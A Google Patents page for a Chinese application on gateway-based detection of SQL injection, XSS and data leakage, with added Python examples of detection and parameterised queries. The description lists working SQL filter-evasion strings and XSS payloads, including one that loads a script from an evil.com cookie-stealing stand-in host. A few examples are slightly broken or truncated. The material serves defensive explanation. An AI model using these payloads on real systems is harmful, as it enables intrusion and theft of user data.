CN112861125A - Security detection method, device, equipment and storage medium based on open platform - Google Patents


Publication number
CN112861125A
Authority
CN
China
Prior art keywords
data
open platform
detection
service
security
Legal status (as listed by Google Patents; not a legal conclusion)
Pending
Application number
CN202110255514.1A
Other languages
Chinese (zh)
Inventor
龚毅
林振钦
Current Assignee (as listed by Google Patents; may be inaccurate)
Dongpu Software Co Ltd
Original Assignee
Dongpu Software Co Ltd
Filing and publication
Application CN202110255514.1A filed by Dongpu Software Co Ltd; priority to CN202110255514.1A; published as CN112861125A; legal status pending.

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 12/00 Data switching networks
    • H04L 12/66 Arrangements for connecting between networks having differing types of switching systems, e.g. gateways
    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F 21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F 21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F 21/55 Detecting local intrusion or implementing counter-measures
    • G06F 21/554 Detecting local intrusion or implementing counter-measures involving event detection and direct action

Abstract

The invention discloses a security detection method, device, equipment and storage medium based on an open platform. It addresses the situation in which an enterprise business system exposes many functional interfaces to the outside, each maintained by a different team, so that an intrusion through an interface or a data leak from it is not discovered in time. The open platform analyses the inbound and outbound data of every interface call, supports detection of SQL injection, XSS injection and sensitive data leakage, and issues early warnings and interventions as soon as a problem is found. The enterprise business system can therefore use the gateway to contain the problem before it repairs itself, handle data security problems promptly, and reduce the economic loss caused by data leakage.

Description

Security detection method, device, equipment and storage medium based on open platform
Technical Field
The invention belongs to the technical field of data security, and particularly relates to a security detection method, a security detection device, security detection equipment and a storage medium based on an open platform.
Background
With the rapid development of computer technology, enterprises have moved their business online, which brings great convenience to people's lives but also many security problems. An enterprise exposes many functional interfaces to the outside, and they are maintained by different teams. When an interface is intruded upon or leaks data, the problem is not discovered in time; in most cases it is only dealt with after damage has occurred or after the security team has captured it. Because every functional interface carries a live business scenario, once a data security problem occurs the interface can only be reopened after the business system has been repaired and has gone through the release process. Failing to discover a data leak promptly, or being slow to respond to it, therefore lengthens the time during which the enterprise is exposed to damage. A detection method that finds data leakage problems in time is urgently needed, both to keep enterprises from suffering economic loss through leaked business data and to prevent criminals who steal enterprise data from using it for data selling, fraud, commercial competition and other malicious activities.
The following data leakage detection schemes are mainly used at present:
1) Content-based detection of data files. The user predefines or customises keyword features, the content of data files is matched against them during transmission, and a match raises an alarm or is intercepted. The drawback is that the scheme cannot handle encrypted traffic: when an attacker uses an encrypted protocol such as RDP or SSH, or encrypts the file itself before transmission, the system cannot inspect it, so there are many missed and false detections. The accuracy of the system also depends entirely on whether the keyword feature set is complete and accurate.
2) Detection based on analysis of user operation behaviour, which requires a dedicated detection and analysis agent to be installed on the terminal side to audit user behaviour. First, installing software on terminals affects the stability of the service: changing system configuration and hooking process behaviour can cause software faults and increase system instability, while also adding system overhead. Second, when the number of terminals is large the detection system is hard to maintain and difficult to deploy.
3) Rule-driven detection: acquire the data to be detected, determine a target association rule from its feature information, generate a security detection task for the data from the target association rule under a preset service framework, execute the task to obtain a result, and generate the corresponding association event. No separate detection code has to be written for each case; the security monitoring task is produced from the association rule and the service framework, different checks are obtained by changing the target association rule, and the work needed to add or modify a rule is far less than that needed to write or modify detection code, so labour and time are saved.
Disclosure of Invention
The invention aims to provide a security detection method, device, equipment and storage medium based on an open platform. The open platform analyses the inbound and outbound data of every interface call, supports detection of SQL injection, XSS injection and sensitive data leakage, and raises an early warning as soon as a problem is found, so that the enterprise business system can use the gateway to contain the problem before it repairs itself, handle data security problems promptly, and reduce the economic loss caused by data leakage.
To this end, the technical solution of the invention is as follows:
A security detection method based on an open platform, where the open platform comprises a gateway service, a Kafka message system, a data analysis service and a data processing service. The method comprises the following steps:
collecting the functional interfaces of the tested business system and connecting them uniformly to the gateway of the open platform;
acquiring the data of each functional interface through the gateway service and bypassing (copying) the acquired data to the Kafka message system, the data being the data exchanged between the tested business system and an external third party;
the data analysis service reading the data from the Kafka message system, performing security detection on it, and sending any data security problem found to the data processing service;
and the data processing service sending a corresponding intervention instruction to the gateway service according to the level of the data security problem, thereby implementing data flow control and access right control for the functional interfaces of the tested business system.
According to an embodiment of the invention, the security detection performed by the data analysis service on the data read from the Kafka message system comprises:
detecting SQL injection;
detecting XSS injection;
detecting sensitive data leakage.
According to an embodiment of the invention, detecting SQL injection further comprises:
detecting whether the data is subject to an SQL injection vulnerability and, if so, precompiling the SQL statement so that the data cannot be injected.
According to an embodiment of the invention, precompiling further comprises:
calling the PreparedStatement class of JDBC to precompile the statement and produce a compiled SQL statement; when the data is executed, the compiled SQL statement is used directly with the data bound as parameters, so that SQL injection is avoided.
According to an embodiment of the invention, detecting XSS injection further comprises:
decoding the data so that the attack payload is exposed for analysis;
performing lexical extraction on the decoded data to obtain HTML data and JavaScript data;
performing syntax detection on the JavaScript data to obtain a detection result;
and performing semantic judgement on the syntax detection result to obtain the probability that the data carries an XSS injection.
According to an embodiment of the invention, detecting sensitive data leakage further comprises:
using natural language processing and text classification algorithms, together with artificial intelligence and machine learning techniques, to build a classification model that can understand and identify natural language; associating documents with one or more predefined categories according to the semantic features and format of the text; clustering and classifying key data; and monitoring in real time whether the data exchanged between the tested business system and the external third party contains data of the key categories, so that the use and outbound transfer of key data is monitored and audited and sensitive data leakage is avoided.
A security detection apparatus based on an open platform, comprising:
an interface access module for collecting the functional interfaces of the tested business system and connecting them uniformly to the gateway of the open platform;
a data acquisition module for acquiring the data of each functional interface through the gateway service and bypassing the acquired data to the Kafka message system, the data being the data exchanged between the tested business system and an external third party;
a data analysis module for reading the data from the Kafka message system through the data analysis service, performing security detection and sending any data security problem found to the data processing service;
and a data processing module for sending, through the data processing service, a corresponding intervention instruction to the gateway service according to the level of the data security problem, thereby implementing data flow control and access right control for the functional interfaces of the tested business system.
According to an embodiment of the present invention, the data analysis module includes a first detection unit, a second detection unit, and a third detection unit;
the first detection unit is used for detecting SQL injection;
the second detection unit is used for detecting XSS injection;
the third detection unit is used for detecting sensitive data leakage.
The security detection equipment based on the open platform comprises a memory and a processor. The memory stores computer-readable instructions which, when executed by the processor, implement the security detection method based on the open platform of an embodiment of the invention.
A computer-readable medium stores a computer program which, when executed by one or more processors, implements the security detection method based on the open platform of an embodiment of the invention.
By adopting this technical solution the invention has the following advantages and positive effects over the prior art:
1) The security detection method based on the open platform addresses the situation in which an enterprise business system exposes many functional interfaces maintained by different teams, so that an intrusion through an interface or a data leak from it is not discovered in time. The open platform analyses the inbound and outbound data of every interface call, supports detection of SQL injection, XSS injection and sensitive data leakage, and raises an early warning promptly, so that the business system can use the gateway to contain the problem before repairing itself, handle data security problems in time, and reduce the economic loss caused by data leakage.
2) The functional interfaces of the tested business system are collected and connected uniformly to the gateway of the open platform, so interface data is managed centrally and each communication interface no longer has to be managed and maintained on its own, saving manpower and material resources and reducing the enterprise's maintenance cost.
3) Interface data is bypassed (copied) from the gateway service to the Kafka message system. Compared with a call model in which the Kafka side sends a request and the gateway responds, this transmission mode greatly simplifies the data processing logic and shortens the transmission time.
Drawings
Fig. 1 is a flow chart of an open platform-based security detection method according to an embodiment of the present invention;
Fig. 2 is a block diagram of an open platform according to an embodiment of the present invention;
Fig. 3 is a data security detection flow diagram in an embodiment of the present invention;
Fig. 4 is a block diagram of an open platform-based security detection apparatus according to an embodiment of the present invention;
Fig. 5 is a schematic diagram of open platform-based security detection equipment according to an embodiment of the present invention.
Detailed Description
The following describes a security detection method, apparatus, device and storage medium based on an open platform in detail with reference to the accompanying drawings and specific embodiments. Advantages and features of the present invention will become apparent from the following description and from the claims.
Example one
This embodiment provides a data security detection method based on an open platform, addressing the problem that an enterprise exposes many functional interfaces externally, maintained by different teams, so that the security risk of a data leak is not discovered in time. Referring to Fig. 1, the method comprises the following steps:
S1: collecting the functional interfaces of the tested business system and connecting them uniformly to the gateway of the open platform;
S2: acquiring the data of each functional interface through the gateway service and bypassing the acquired data to the Kafka message system, the data being the data exchanged between the tested business system and an external third party;
S3: the data analysis service reading the data from the Kafka message system, performing security detection on it, and sending any data security problem found to the data processing service;
S4: the data processing service sending a corresponding intervention instruction to the gateway service according to the level of the data security problem, thereby implementing data flow control and access right control for the functional interfaces of the tested business system.
Before the method is explained in detail, the open platform of this embodiment is described briefly with reference to Fig. 2. Its architecture comprises a gateway service, an interface forwarding service, an extrapolation service, a data exchange layer, a data analysis service and a background service. The gateway service provides account state detection, interface access authority, request, response and bypass-data functions; the data exchange layer comprises the Kafka message system, a MySQL database and the like; the data analysis service provides data statistics and security detection (SQL injection, XSS injection and data leakage); the background service comprises data maintenance and dynamic intervention (gateway settings, alarm settings, permission settings). The embodiment uses the open platform to perform security detection on the data exchanged between the enterprise's internal business system and external third parties, so as to prevent data leakage. Its application scenario is shown in Fig. 3: the gateway of the open platform copies the data of each functional interface and bypasses it to the Kafka message system, the data analysis service performs security detection on the data, and an alarm is raised when a problem is found. The background service provides a rich set of intervention means; intervention instructions can be delivered to the gateway promptly through Apollo configuration, and the gateway applies flow control, shutdown or other handling according to the instruction.
Specifically, in step S1, because maintaining each of the many externally exposed functional interfaces separately is time-consuming and labour-intensive, the functional interfaces are gathered together and connected uniformly to the gateway of the open platform. When the enterprise's internal business system exchanges data with an external third party through a functional interface, the data first passes through the gateway of the open platform, where security detection is performed centrally; no separate detection is needed for each functional interface, which improves the efficiency of data security detection and avoids wasting manpower and time.
In step S2, the gateway service acquires the data of each functional interface and bypasses it to the Kafka message system: the request and response functions of the gateway service make a complete copy of the interface data passing through the gateway and send it directly to the Kafka message system. Bypassing is used rather than calling because bypassing simply packages the data and transmits it to Kafka, which is quick and leaves nothing retained in the gateway, whereas calling would require the Kafka side to send a request and the gateway to respond, making the data processing logic more complex, taking longer, and reducing the efficiency of the subsequent security detection.
Kafka is a high-throughput distributed publish-subscribe messaging system that can handle all of the action stream data of a consumer-facing web site. Using Kafka has the following effects:
1) Kafka acts as a buffer. Data arrives continuously from the gateway; without Kafka receiving it and handing it to the data analysis service in controlled batches over time, the computational load on the data analysis service would keep growing until the system was overwhelmed and possibly crashed. Kafka runs on its own set of servers (a Kafka cluster), so the buffering does not put that load on the analysis system.
2) Kafka reduces the need for multiple integrations. Because all data passes through Kafka, developers do not have to write a separate integration to obtain data from each system.
3) Kafka has low latency and high throughput. By decoupling the data flow, Kafka lets the data analysis service consume the data as needed. Without slow point-to-point integrations, the delay to load each data point comes down to around 10 milliseconds, roughly ten times or more lower than with other integrations, so data can be supplied quickly and in near real time.
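To make the S1 to S4 flow concrete, the following Python is an added example, not code from the patent or from Dongpu Software: a gateway object forwards to the tested business system, copies each request and response onto a queue that stands in for the Kafka topic (the bypass), and enforces whatever intervention state has been set for an interface; the analysis service drains the queue, and the processing service maps the level of each finding to an intervention and pushes it back to the gateway. The level-to-intervention table, the toy detector, the backend responses and the interface names are all assumptions made for this example.

```python
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

# Assumed mapping from problem level to gateway intervention. The page says the
# instruction depends on the level but gives no table; this one is invented here.
INTERVENTIONS = {1: "alert", 2: "rate_limit", 3: "close"}


@dataclass
class Finding:
    interface: str
    level: int
    detail: str


@dataclass
class Gateway:
    """Open-platform gateway: forwards to the tested business system, copies each
    request/response onto the bus (the bypass), and enforces intervention state."""
    backend: Callable[[str, str], str]       # the tested business system
    bus: deque                                # stands in for the Kafka topic
    policy: Dict[str, str] = field(default_factory=dict)
    counters: Dict[str, int] = field(default_factory=dict)
    rate_limit: int = 2                       # requests allowed once an interface is rate-limited

    def handle(self, interface: str, payload: str) -> Tuple[int, str]:
        state = self.policy.get(interface, "open")
        if state == "close":
            return 403, "interface closed by open platform"
        if state == "rate_limit":
            self.counters[interface] = self.counters.get(interface, 0) + 1
            if self.counters[interface] > self.rate_limit:
                return 429, "rate limited by open platform"
        response = self.backend(interface, payload)
        # Bypass: publish a copy and return at once; analysis happens asynchronously.
        self.bus.append({"interface": interface, "request": payload, "response": response})
        return 200, response

    def apply(self, interface: str, instruction: str) -> None:
        """Intervention instruction from the data processing service (delivered via
        Apollo configuration on the page; a direct call here)."""
        self.policy[interface] = instruction


def data_analysis_service(bus: deque, detector: Callable[[dict], Optional[Finding]]) -> List[Finding]:
    """Consumer side: drain the topic and run the detector on every copied record."""
    findings = []
    while bus:
        finding = detector(bus.popleft())
        if finding is not None:
            findings.append(finding)
    return findings


def data_processing_service(findings: List[Finding], gateway: Gateway) -> List[Tuple[str, str]]:
    """Map each finding's level to an intervention and push it to the gateway."""
    issued = []
    for f in findings:
        instruction = INTERVENTIONS.get(f.level, "alert")
        if instruction != "alert":
            gateway.apply(f.interface, instruction)
        issued.append((f.interface, instruction))
    return issued


# Toy detector and backend, constructed for this example only.
def demo_detector(record: dict) -> Optional[Finding]:
    request = record["request"].lower()
    if "union" in request and "select" in request:
        return Finding(record["interface"], 3, "SQL injection attempt in request")
    if re.search(r"\b\d{16}\b", record["response"]):
        return Finding(record["interface"], 2, "card-number-like value in response")
    return None


def demo_backend(interface: str, payload: str) -> str:
    if interface == "/order/detail":
        return "order 7: card=4111111111111111"   # constructed leaky response
    return f"{interface} ok"


def run_demo() -> Tuple[List[int], List[Tuple[str, str]], List[int]]:
    bus: deque = deque()
    gw = Gateway(backend=demo_backend, bus=bus)
    before = [gw.handle("/user/login", "name=x' UNION SELECT password FROM users--")[0],
              gw.handle("/order/detail", "id=7")[0]]
    findings = data_analysis_service(bus, demo_detector)
    issued = data_processing_service(findings, gw)
    after = [gw.handle("/user/login", "name=bob")[0]]
    after += [gw.handle("/order/detail", "id=7")[0] for _ in range(3)]
    return before, issued, after


if __name__ == "__main__":
    print(run_demo())
```

The `before` statuses are both 200: because the copy is taken out of band, the request that triggered the finding has already reached the business system by the time the intervention lands. That is the price of the bypass design the text prefers over a synchronous call, and it is why the page positions the platform as early warning plus subsequent flow and access control rather than inline blocking.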
In step S3, the data analysis service reads the data from the Kafka message system, performs security detection on it, and sends any data security problem found to the data processing service. The security detection performed on the data read from the Kafka message system further comprises:
s21: detecting SQL injection;
s22: detection of XSS injection;
s23: and detection of sensitive data leaks.
Specifically, in step S21: SQL injection is the insertion of SQL commands by an attacker into the input fields of a Web form or the query string of a page request, tricking the server into executing malicious SQL.
Typical e-commerce applications use a database to store information. Whether it holds product information, account information or other data, the database is a critical link in a Web application environment. SQL commands are the interface between the front-end Web tier and the back-end database through which data is passed in both directions. That data must be controlled so that a user can only obtain the information he is authorised to have. Many Web sites, however, build SQL queries dynamically from user-supplied parameters, so an attacker can alter the query by supplying his own SQL in a URL, form field or other input and deceive the application into granting unrestricted access to the database.
Because SQL queries are used for authentication, authorisation, ordering, printing lists and so on, allowing an attacker to submit arbitrary SQL is very dangerous: typically the attacker can use injected SQL to retrieve information from the database without authorisation.
Any Web application that passes input to a back-end database may be subject to SQL injection. SQL can be placed in a URL, a form field or any other input parameter that ends up in a dynamically generated SQL statement. Because most Web applications rely on large database stores and on the logical relationships between their tables (user permissions, settings and so on), each query carries a large number of parameters.
Specific SQL injection techniques include:
1. Building the injected SQL from inline comment sequences. Although the resulting strings look long, they can bypass a range of input filters. If a filter removes or blocks the whitespace following each SQL keyword, the keywords can instead be separated by inline comments, so no whitespace character is needed and the filter is easily bypassed, for example:
/**/UNION/**/SELECT/**/password/**/FROM/**/users/**/WHERE/**/username='root'--
In MySQL, inline comments can also be placed inside SQL keywords themselves to bypass common keyword filters, for example:
/**/UN/**/ION/**/SE/**/LECT/**/password/**/FROM/**/users/**/WHERE/**/username='root'--
Whether a given MySQL version accepts a keyword split by a comment must be tested against the target; a detector should normalise such input regardless, rather than assume the database will reject it.
2. Using URL encoding
URL encoding is the format browsers use to package form input; the user data in a Web form is sent to the server URL-encoded. A URL-encoded character is the two-digit hexadecimal ASCII code of the character preceded by %. For example, the ASCII code of "\" is 92 in decimal and 5c in hexadecimal, so its URL encoding is %5c.
Suppose a SQL filter blocks whitespace and the inline comment sequence /**/ but does not block the URL-encoded form of the comment sequence. A malicious user can then bypass the filter with:
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/password%2f%2a*/FROM%2f%2a*/users%2f%2a*/WHERE%2f%2a*/username='root'--
where %2f%2a decodes to /* and the server-side decoding reassembles /**/ before the SQL is parsed.
3. Union query injection using UNION
A database administrator uses UNION to combine two or more SELECT statements, so in an SQL injection attack the UNION operator is useful: a UNION query injected into a site reached by a user reads tables that the database user can access. UNION injection has two constraints: the two queries must return the same number of columns, and the corresponding columns of the two SELECT statements must have compatible types. If either constraint is violated the query fails with an error, and the error message does not reveal the number of columns. There are two main ways to find the correct number of columns. The first is to inject the second query repeatedly, adding one column each time, until the query executes correctly. The second is to use an ORDER BY clause instead of injecting another query: ORDER BY accepts either a column name or a number identifying a column by position, so incrementing the number in ORDER BY until an error appears reveals the number of columns in the query. Once the exact number of columns is known, one or more of them is selected to check whether it carries the data being sought.
4. Bypassing input filters
Web developers usually add user input filters during development to protect against common attacks, including SQL injection. The filters may be code written by a software engineer or a Web application firewall.
In the context of SQL injection, filters typically block input that contains one or more of the following: SQL keywords such as SELECT, AND, UNION and INSERT; and special characters such as quotation marks, hyphens and spaces.
Code protected by an input filter is not absolutely safe, and ways can still be found to exploit an injection vulnerability while circumventing the filter. If the filter matches attack keywords only in upper case or only in lower case, the case variation technique bypasses it by changing the case of the characters in the attack string, because SQL keywords are case-insensitive in the database. For example, if the following input is blocked:
UNION SELECT PASSWORD FROM Users WHERE USERNAME='root'--
then the filter can be bypassed with:
UNION SELECT password FROM users WHERE username='root'--
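The filter-evasion variants listed above (comment sequences, keyword splitting, URL encoding, case variation) are exactly what a detection service has to undo before keyword rules become useful. The following Python is an added example written for this page, not code from the patent: it normalises the value (repeated URL decoding, unwrapping MySQL /*!...*/ executable comments while keeping their content, removing ordinary comments, collapsing whitespace, case folding) and then applies a small constructed rule set, next to a naive upper-case keyword filter of the kind the text describes. The payloads and the rule set are constructed for the example and are not the patent's.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Executable MySQL comments (/*! ... */) are unwrapped, keeping their content,
# because the server executes what is inside them; ordinary comments are removed
# entirely, so keyword splitting such as UN/**/ION collapses to UNION as well.
MYSQL_EXEC_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.DOTALL)
COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Rules applied to the normalised text. Constructed for this example; a real
# rule set would be broader. \s* (not \s+) tolerates the collapsed comments.
SQLI_RULES = {
    "union_select": re.compile(r"\bunion\s*(all\s*)?select"),
    "tautology": re.compile(r"\bor\s*'?\w+'?\s*=\s*'?\w+'?"),
    "comment_tail": re.compile(r"--\s*$"),
    "stacked_query": re.compile(r";\s*(drop|insert|update|delete|exec)\b"),
}


def naive_filter(value: str) -> bool:
    """A filter of the kind the text describes: upper-case keywords followed by a space."""
    return re.search(r"(UNION|SELECT|INSERT) ", value) is not None


def normalize(value: str, max_rounds: int = 3) -> str:
    """Undo the evasions before matching: repeated URL decoding, comment
    unwrapping/removal, whitespace collapsing and case folding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = MYSQL_EXEC_COMMENT.sub(r"\1", value)
    value = COMMENT.sub("", value)
    value = re.sub(r"\s+", " ", value)
    return value.strip().lower()


def detect(value: str) -> List[str]:
    """Names of the rules that fire on the normalised input, sorted."""
    text = normalize(value)
    return sorted(name for name, rule in SQLI_RULES.items() if rule.search(text))


# Constructed test inputs, one per evasion discussed in the text plus a benign value.
PAYLOADS: Dict[str, str] = {
    "plain": "x' UNION SELECT password FROM users WHERE username='root'--",
    "inline_comments": "x'/**/UNION/**/SELECT/**/password/**/FROM/**/users/**/WHERE/**/username='root'--",
    "split_keywords": "x'/**/UN/**/ION/**/SE/**/LECT/**/password/**/FROM/**/users/**/WHERE/**/username='root'--",
    "url_encoded": "x'%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/password%2f%2a*/FROM%2f%2a*/users%2f%2a*/WHERE%2f%2a*/username%3D'root'--",
    "case_variant": "x' union select password from users where username='root'--",
    "benign": "O'Brien and Sons, 42 Union St",
}


def compare() -> Dict[str, Dict[str, object]]:
    """Side by side: what the naive filter blocks versus what normalised detection flags."""
    return {name: {"naive": naive_filter(p), "rules": detect(p)} for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, result in compare().items():
        print(f"{name:16s} naive={result['naive']!s:5s} rules={result['rules']}")
```

Only the plain payload trips the naive filter; every evasion is caught after normalisation, and the benign address with the word "Union" in it is not flagged. Removing comments outright rather than replacing them with a space is a deliberate choice: it follows the MySQL keyword-splitting claim in the text, at the cost that UNION/**/SELECT becomes UNIONSELECT, which is why the rules use \s* between keywords.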
SQL injection exploits carelessness in how the programmer writes the code; through SQL statements an attacker can log in without an account or even tamper with the database, and the injected text can only affect what is queried or tampered with while the SQL statement is being compiled (parsed). To avoid SQL injection attacks, it is therefore first necessary to detect whether the data carries an SQL injection vulnerability.
In step S31, it is detected whether the data carries an SQL injection vulnerability and, if so, the statement is precompiled so that the data cannot be injected.
All programs with SQL injection vulnerabilities receive variables or parameters supplied by the client (for example in a URL entered by the user) that become part of an SQL statement. Content entered by users and parameters passed in must always be treated with suspicion; this is the principle of "external data is untrusted" in the security field. Detection of SQL injection vulnerabilities in data can start from the following aspects:
1. Checking the data type and format of variables
If the SQL statement has the form where id={$id} and every id in the database is a number, then check that the variable id is of int type before the SQL is executed; if an e-mail address is accepted, check strictly that the variable is in e-mail format; dates, times and other typed values are handled in the same way. In short, wherever a variable has a fixed format it should be checked strictly against that format before the SQL statement is executed, so that it is guaranteed to be in the expected form.
2. Filtering special characters
For variables whose format cannot be fixed, special characters must be filtered or escaped.
3. Binding variables with precompiled statements
Binding variables through precompiled statements is the best way to prevent SQL injection. In a precompiled SQL statement each variable is represented by a question mark placeholder (?), so no matter what an attacker supplies as the value, the structure of the SQL statement cannot be changed.
For precompiling the data, step S41 may be used: call the PreparedStatement class of JDBC to precompile the statement and produce a compiled SQL statement; when the data is executed the compiled statement is used directly with the data bound as parameters, so SQL injection is avoided.
The principle of precompilation is that the parts of the SQL statement that the client can control are first compiled as a set of parameters, producing a corresponding set of temporary variables; the elements of that set are then assigned with the corresponding setter methods, and the assignment function setString() performs mandatory type and safety checks on the value passed in, so that SQL injection is avoided.
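The three aspects above (type and format checks, escaping, precompiled statements with bound parameters) can be shown in a few lines. The page describes the JDBC PreparedStatement; the following is an added Python example, not code from the patent, using sqlite3 parameter binding as the equivalent of PreparedStatement plus setString. The table contents, the UNION payload and the check functions are constructed for the example.

```python
import re
import sqlite3
from datetime import date
from typing import List, Tuple

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


# Aspect 1: variables with a fixed type or format are checked before any SQL runs.
def check_id(value: str) -> int:
    if not value.isdigit():
        raise ValueError(f"id must be an integer, got {value!r}")
    return int(value)


def check_email(value: str) -> str:
    if not EMAIL_RE.match(value):
        raise ValueError(f"not an e-mail address: {value!r}")
    return value


def check_date(value: str) -> date:
    return date.fromisoformat(value)   # raises ValueError unless YYYY-MM-DD


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the business system's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "root", "s3cret"), (2, "alice", "hunter2")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """The 'before' case: the value is spliced into the SQL text, so a UNION in the
    value changes the structure of the statement and reads another column."""
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """Aspect 3: the statement is compiled with a ? placeholder and the value is bound
    afterwards (the Python counterpart of JDBC PreparedStatement plus setString), so the
    value is only ever compared as data and is never parsed as SQL."""
    return conn.execute("SELECT id, username FROM users WHERE username = ?", (username,)).fetchall()


def demo() -> dict:
    conn = setup_db()
    # Constructed UNION payload in the style discussed in the text.
    payload = "x' UNION SELECT id, password FROM users--"
    return {
        "vulnerable": lookup_vulnerable(conn, payload),
        "parameterized": lookup_parameterized(conn, payload),
        "legitimate": lookup_parameterized(conn, "root"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable lookup returns every password in the table; the same payload bound as a parameter matches no row, while the legitimate value still works. Aspect 2 (escaping free-form text) is deliberately not shown as a separate function: once values are bound rather than concatenated, the driver handles quoting, and hand-written escaping becomes a fallback for the rare case where a value must end up in the SQL text itself.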
In step S22: XSS injection, also written CSS (Cross Site Script) in older material, is an attack in which the attacker exploits insufficient filtering of user input by a web site's code to enter HTML that is rendered for other users, in order to steal user data, perform actions under the user's identity, or deliver malware to visitors.
In an XSS attack the intruder inserts maliciously crafted data into the HTML of a remote web page. The user regards the page as trustworthy, but when the browser loads the page the embedded script is interpreted and executed. Because HTML allows scripts for simple interaction, an intruder who manages to insert malicious HTML into a page can, for example, record the user information (cookie) a forum stores; since the cookie holds the complete user name and password data, the user suffers a security loss. A one-line script such as alert(document.cookie) is enough to pop up a message box containing the user's information; an intruder can equally send the information to a page he controls and, with a little analysis, obtain the user's sensitive data.
Specific XSS injection methods include:
1. Injecting HTML/JavaScript with the <script> tag
By introducing the < and > characters of an HTML tag, a malicious user can use the <script> tag to insert arbitrary JavaScript and VBScript code. The simplest form of an XSS attack is to place the attack string inside a <script> tag; attack payloads look like the following:
<script>alert('XSS')</script>
<script>location.href="http://www.evil.com"</script>
<script src="http://www.evil.com/cookie.php"></script>
A Cheat Sheet test with this kind of payload produces a Web log URL such as: /DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%E2%80%98xss%E2%80%99%29%3B%3C%2Fscript%3E
The Web log URL is read as follows:
%3C: the URL-encoded form of the opening angle bracket of the payload, which can be regarded as an attack-vector string; script: a usable HTML tag and attack vector, not URL-encoded; alert: the attack function of the payload, not URL-encoded; %3C%2F: the opening angle bracket and forward slash of the closing tag, which can be regarded as a special attack-vector string.
2. Injecting JavaScript through the attribute values of HTML tags
Malicious users may also use tag attribute values to inject JavaScript. Many HTML tags have attributes that accept the javascript: pseudo-protocol, in which the URL body is arbitrary JavaScript code that the browser interprets and executes. A malicious user can therefore perform XSS through the attribute values of some HTML tags; attack payloads look like the following:
<img src="javascript:alert('XSS')">
<img background="javascript:alert('XSS')">
<a href="javascript:alert('a warning href XSS')">link</a>
The Web log URL obtained from such a payload has content similar to:
/DVWA/vulnerabilities/xss_r/?name=%3Cimg+src%3D%22javascript%3Aalert%28%27xss%27%29%3B%22%3E
The Web log URL is read as follows: javascript: an attack-vector string that an XSS filter can screen for; img: an attack-vector string; +src: the space is obtained by URL encoding; alert: the JavaScript alert function, which can be regarded as an attack-vector value; the rest: obtained by URL encoding or output directly.
3. Transcoding HTML tag attribute values
Malicious users can transcode attribute values to get around filtering of those values, because HTML tag attributes themselves accept character references for ASCII codes. Attack payloads that transcode an attribute value mainly take the following forms:
Using a blank space: alert("XSS")" width=50>
Using ASCII codes: <img src="javascrip&#116&#58alert('XSS')" width=50>
As the ASCII table shows, the ASCII code of t is 116 and that of : is 58, so javascript:alert("XSS"); can be transcoded into:
javascrip&#116&#58alert("XSS")
The Web log obtained from the payload is as follows:
/DVWA/vulnerabilities/xss_r/?name=%3Cimg+src%3D%22javascrip%26%23116%26%2358alert%28%27xss%27%29%3B%22+width%3D100%3E
The Web log URL is read as follows: javascrip%26%23116: the transcoded form of the javascript keyword, which can be regarded as an attack vector; +src: the space is obtained by URL encoding; %3Cimg: opening bracket and HTML tag element; %26%2358: the transcoded form of the colon (&#58).
4. Cross-site injection of JavaScript using CSS
Malicious users can also inject JavaScript through CSS style sheets; injecting and executing JavaScript through a style sheet offers a certain flexibility and concealment. Attack payloads look like the following:
<div style="background-image:url(javascript:alert('xss'))">
<div style="width:expression(alert('xss'));">
<style>
@import "javascript:alert('xss')";
the Web log is obtained from the payload as follows:
Cx27%5Cx27%5Cx58%5Cx53%5Cx53%5Cx27%5Cx29%22%29%3B%3C%2Fscript%3E.
The Web log URL is read as follows: eval | alert | script: attack vectors encoded as characters; %3C | %3E: the encoded opening and closing brackets; the rest: URL encoding.
5. Injecting JavaScript through events
An event is an action performed by the user or the browser, and the interaction between JavaScript and HTML is realized through events, for example mouseover, load and click. An example:
<input type=button value="a click" onclick="alert('a click')"/>
After this code runs, clicking the button [a click] triggers the onclick event, which then executes the JavaScript code [alert('a click')]. Events that can be used also include onerror, onSeek, onStop, onResume, onReverse and so on.
A typical attack payload: <img src="#" onerror=alert('xss')>
The Web log obtained from the payload:
/dvwa/vulnerabilities/xss_r/?name=%3Cimg+src%3D%22%23%22+onerror%3Dalert%28%27xss%27%29%3E
The Web log is read as follows: %3C: opening bracket; onerror | onclick | onResume | img: the event-based attack vector; the rest: URL-encoded or passed directly to the Web log.
6. Bypassing filtering with character encoding
Character encoding not only lets XSS script code bypass server-side filtering, it also hides the shellcode better. Attack payloads look like the following:
<script>eval("\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29");</script>
<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">
